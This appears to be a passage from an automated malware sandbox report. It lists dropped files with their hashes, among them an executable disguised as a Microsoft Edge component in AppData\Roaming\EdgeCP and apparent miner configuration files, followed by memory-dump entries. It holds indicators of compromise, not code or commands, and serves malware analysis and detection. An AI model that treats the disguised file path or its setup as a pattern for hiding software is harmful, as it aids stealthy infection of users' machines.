72bef76fffeee9433e97763a04116aeaebbde45e9c3991673b9ff363f06bd246

SHA512
3c21c5e5b26483c25e9e76f819b629b28f2770f94dcf83dfccf193b92cebf8076bc87aa47c7033d24999d8ec16c3401bd1a388e9bdaee86b48194568f03f66bb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD5
78a92da2ceb4c14fc5c60439c573ba55

SHA1
dad5c656f249002137b76f21dd7b6212cd6ba5c9

SHA256
e50efb7600c7a6aa4533601e851ab96226f451c79ae0c5dce1af4c5ae1ef312b

SHA512
1a96e11937a782bf04ed249c64028d0fcb9eb10e44e8a2a1aa52b3c748fac6c2704f6e6c426421a975886a78db97773119d7f56920a4e300173ccf98014b08b5

Download Submit
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
MD5
a1e165e1926c0c83123c89fce6b1af56

SHA1
281246ba4b852a5f62e032424f7816f5a6b0406f

SHA256
2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215

SHA512
28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354

Download Submit
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
MD5
a1e165e1926c0c83123c89fce6b1af56

SHA1
281246ba4b852a5f62e032424f7816f5a6b0406f

SHA256
2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215

SHA512
28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354

Download Submit
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
MD5
a1e165e1926c0c83123c89fce6b1af56

SHA1
281246ba4b852a5f62e032424f7816f5a6b0406f

SHA256
2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215

SHA512
28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354

Download Submit
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
MD5
a1e165e1926c0c83123c89fce6b1af56

SHA1
281246ba4b852a5f62e032424f7816f5a6b0406f

SHA256
2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215

SHA512
28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354

Download Submit
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
MD5
a1e165e1926c0c83123c89fce6b1af56

SHA1
281246ba4b852a5f62e032424f7816f5a6b0406f

SHA256
2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215

SHA512
28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354

Download Submit
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
MD5
a1e165e1926c0c83123c89fce6b1af56

SHA1
281246ba4b852a5f62e032424f7816f5a6b0406f

SHA256
2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215

SHA512
28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354

Download Submit
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
MD5
a1e165e1926c0c83123c89fce6b1af56

SHA1
281246ba4b852a5f62e032424f7816f5a6b0406f

SHA256
2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215

SHA512
28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354

Download Submit
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
MD5
a1e165e1926c0c83123c89fce6b1af56

SHA1
281246ba4b852a5f62e032424f7816f5a6b0406f

SHA256
2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215

SHA512
28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354

Download Submit
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
MD5
a1e165e1926c0c83123c89fce6b1af56

SHA1
281246ba4b852a5f62e032424f7816f5a6b0406f

SHA256
2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215

SHA512
28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354

Download Submit
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
MD5
a1e165e1926c0c83123c89fce6b1af56

SHA1
281246ba4b852a5f62e032424f7816f5a6b0406f

SHA256
2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215

SHA512
28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354

Download Submit
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
MD5
a1e165e1926c0c83123c89fce6b1af56

SHA1
281246ba4b852a5f62e032424f7816f5a6b0406f

SHA256
2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215

SHA512
28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354

Download Submit
C:\Users\Admin\AppData\Roaming\EdgeCP\heur.conf
MD5
8d420eababb7173b1abb86df8fcbd30c

SHA1
11b77c1218bf308d47bb4b89600d3f72af82d525

SHA256
1ccfc7778c058e57f64c2e6b985a2c3ea606f0c34b06ac2f4cd2bcf9706d05ba

SHA512
d863762d88eef79119430f81c77291de5dac47a5465a049843366506caa1fe6dfff96c4179b4ae2f9e919a799e138e3f7f61f77a2adc35eb82a5be1c7892628d

Download Submit
C:\Users\Admin\AppData\Roaming\EdgeCP\id.conf
MD5
b00c123d815a930170e26e53e8b25ed6

SHA1
00d8d13f01b6d19dfac915360ce5bc6f642b1a9d

SHA256
f25915f5984850d954669dcd96b8936746cba6479d18b7a373e83f83e83ad3b2

SHA512
ddf84c9ba25a25e390f955db9d3e34d9f0d3e2a32fb667d9eafd957c9904c45c8691935e2125661b44c48349070679ff5a142868909ea5f8c1e185fc61b167db

Download Submit
C:\Users\Admin\AppData\Roaming\EdgeCP\wallet.conf
MD5
69bf7238c8e32793411515d8ca5926a9

SHA1
d6918bcceab927a036b760a82cadd340d83b8ed1

SHA256
57df56c1be46da0057f1afe0147ac7a700fa4df393bf0b31cabd158939d1cb66

SHA512
4a3f787a09c553dd6012d0529644d9b0e7ac672be032eead2d7f9db9a64ce46f315ae01771f893d35160cc597e7df2fab2b600f6b3ff5e97ca8df403699299f3

Download Submit
\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
MD5
a1e165e1926c0c83123c89fce6b1af56

SHA1
281246ba4b852a5f62e032424f7816f5a6b0406f

SHA256
2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215

SHA512
28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354

Download Submit
\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
MD5
a1e165e1926c0c83123c89fce6b1af56

SHA1
281246ba4b852a5f62e032424f7816f5a6b0406f

SHA256
2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215

SHA512
28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354

Download Submit
\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
MD5
a1e165e1926c0c83123c89fce6b1af56

SHA1
281246ba4b852a5f62e032424f7816f5a6b0406f

SHA256
2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215

SHA512
28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354

Download Submit
\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
MD5
a1e165e1926c0c83123c89fce6b1af56

SHA1
281246ba4b852a5f62e032424f7816f5a6b0406f

SHA256
2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215

SHA512
28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354

Download Submit
\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
MD5
a1e165e1926c0c83123c89fce6b1af56

SHA1
281246ba4b852a5f62e032424f7816f5a6b0406f

SHA256
2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215

SHA512
28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354

Download Submit
\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
MD5
a1e165e1926c0c83123c89fce6b1af56

SHA1
281246ba4b852a5f62e032424f7816f5a6b0406f

SHA256
2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215

SHA512
28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354

Download Submit
\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
MD5
a1e165e1926c0c83123c89fce6b1af56

SHA1
281246ba4b852a5f62e032424f7816f5a6b0406f

SHA256
2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215

SHA512
28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354

Download Submit
memory/288-75-0x0000000000000000-mapping.dmp

Download
memory/316-62-0x0000000000000000-mapping.dmp

Download
memory/332-87-0x0000000000000000-mapping.dmp

Download
memory/540-167-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/540-159-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/540-160-0x00000000004010B8-mapping.dmp

Download
memory/548-190-0x00000000006F0000-0x00000000006F1000-memory.dmp

Filesize
4KB

Download
memory/548-185-0x0000000000000000-mapping.dmp

Download
memory/756-83-0x0000000000000000-mapping.dmp

Download
memory/804-192-0x0000000000000000-mapping.dmp

Download
memory/836-135-0x00000000004466F4-mapping.dmp

Download
memory/836-134-0x0000000000400000-0x000000000047C000-memory.dmp

Filesize
496KB

Download
memory/836-138-0x0000000000400000-0x000000000047C000-memory.dmp

Filesize
496KB

Download
memory/844-182-0x0000000000000000-mapping.dmp

Download
memory/956-157-0x0000000000401000-mapping.dmp

Download
memory/956-156-0x0000000000400000-0x0000000000413000-memory.dmp

Filesize
76KB

Download
memory/956-166-0x0000000000400000-0x0000000000413000-memory.dmp

Filesize
76KB

Download
memory/960-88-0x0000000000000000-mapping.dmp

Download
memory/976-155-0x0000000000400000-0x0000000000455000-memory.dmp

Filesize
340KB

Download
memory/976-151-0x0000000000400000-0x0000000000455000-memory.dmp

Filesize
340KB

Download
memory/976-152-0x000000000044412E-mapping.dmp

Download
memory/1036-59-0x0000000075721000-0x0000000075723000-memory.dmp

Filesize
8KB

Download
memory/1060-191-0x0000000000000000-mapping.dmp

Download
memory/1148-184-0x0000000000400000-0x000000000040E000-memory.dmp

Filesize
56KB

Download
memory/1148-179-0x0000000000401000-mapping.dmp

Download
memory/1336-80-0x0000000000000000-mapping.dmp

Download
memory/1348-84-0x0000000000000000-mapping.dmp

Download
memory/1500-178-0x0000000000400000-0x0000000000431000-memory.dmp

Filesize
196KB

Download
memory/1500-174-0x0000000000401000-mapping.dmp

Download
memory/1500-173-0x0000000000400000-0x0000000000431000-memory.dmp

Filesize
196KB

Download
memory/1596-146-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/1596-150-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/1596-147-0x0000000000413E10-mapping.dmp

Download
memory/1612-97-0x0000000006080000-0x0000000006081000-memory.dmp

Filesize
4KB

Download
memory/1612-81-0x0000000002490000-0x0000000002491000-memory.dmp

Filesize
4KB

Download
memory/1612-66-0x0000000000000000-mapping.dmp

Download
memory/1612-69-0x0000000001F10000-0x0000000001F11000-memory.dmp

Filesize
4KB

Download
memory/1612-76-0x00000000020D0000-0x0000000002D1A000-memory.dmp

Filesize
12.3MB

Download
memory/1612-85-0x0000000005240000-0x0000000005241000-memory.dmp

Filesize
4KB

Download
memory/1612-92-0x0000000005FE0000-0x0000000005FE1000-memory.dmp

Filesize
4KB

Download
memory/1612-98-0x0000000006190000-0x0000000006191000-memory.dmp

Filesize
4KB

Download
memory/1612-129-0x0000000006310000-0x0000000006311000-memory.dmp

Filesize
4KB

Download
memory/1612-105-0x000000007EF30000-0x000000007EF31000-memory.dmp

Filesize
4KB

Download
memory/1612-128-0x0000000006300000-0x0000000006301000-memory.dmp

Filesize
4KB

Download
memory/1612-113-0x0000000006110000-0x0000000006111000-memory.dmp

Filesize
4KB

Download
memory/1612-106-0x0000000006240000-0x0000000006241000-memory.dmp

Filesize
4KB

Download
memory/1660-133-0x00000000060A0000-0x00000000060A1000-memory.dmp

Filesize
4KB

Download
memory/1660-145-0x0000000006170000-0x0000000006171000-memory.dmp

Filesize
4KB

Download
memory/1660-71-0x00000000046E0000-0x00000000046E1000-memory.dmp

Filesize
4KB

Download
memory/1660-65-0x0000000000000000-mapping.dmp

Download
memory/1776-177-0x0000000000400000-0x0000000000406000-memory.dmp

Filesize
24KB

Download
memory/1776-169-0x0000000000401108-mapping.dmp

Download
memory/1776-168-0x0000000000400000-0x0000000000406000-memory.dmp

Filesize
24KB

Download
memory/1812-89-0x0000000000000000-mapping.dmp

Download
memory/1832-183-0x0000000000000000-mapping.dmp

Download
memory/2032-140-0x0000000000401074-mapping.dmp

Download
memory/2032-139-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/2032-144-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download